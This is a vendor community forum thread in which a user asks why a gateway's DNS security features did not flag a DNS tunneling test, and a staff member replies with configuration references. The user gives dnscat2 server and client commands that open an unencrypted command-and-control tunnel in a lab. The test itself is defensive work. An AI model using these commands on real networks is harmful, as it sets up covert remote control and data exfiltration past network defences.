LongjiangLI
Explorer

R81.20 DNS Tunneling Detection?

Hi Expert,

As we know, R81.20 has published a new feature, the DNS security blade. I have tried using DNSCAT2 to test a DNS tunneling attack but did not find any prevention log; I ONLY see the firewall DNS log.

On the gateway, the Anti-bot, Anti-malware and IPS blades are enabled.

Testing topology: DNSCAT2_Server <---> Gateway <---> DNSCAT2_Client

On the DNSCAT2 server side, I use the command "ruby ./dnscat2.rb --security=open" to create a DNS listener without encryption. On the client side, I use the command "./dnscat --dns server=10.0.20.2,port=53" to CC to the server. Once it is established, that tunnel can be used to do any action on the client PC.

Based on this lab, I want to know why the DNS tunneling was not caught. Thanks!

        

Chris_Atkinson
Employee

To start, could you please confirm how your configuration is set per sk74120 / sk92224?

Please also verify how this protection is currently set.

[Image: Screen Shot 2019-12-06 at 4.15.13 PM.png]

Refer also to sk178487 - ThreatCloud DNS Tunneling Protection.

CCSM R77/R80/ELITE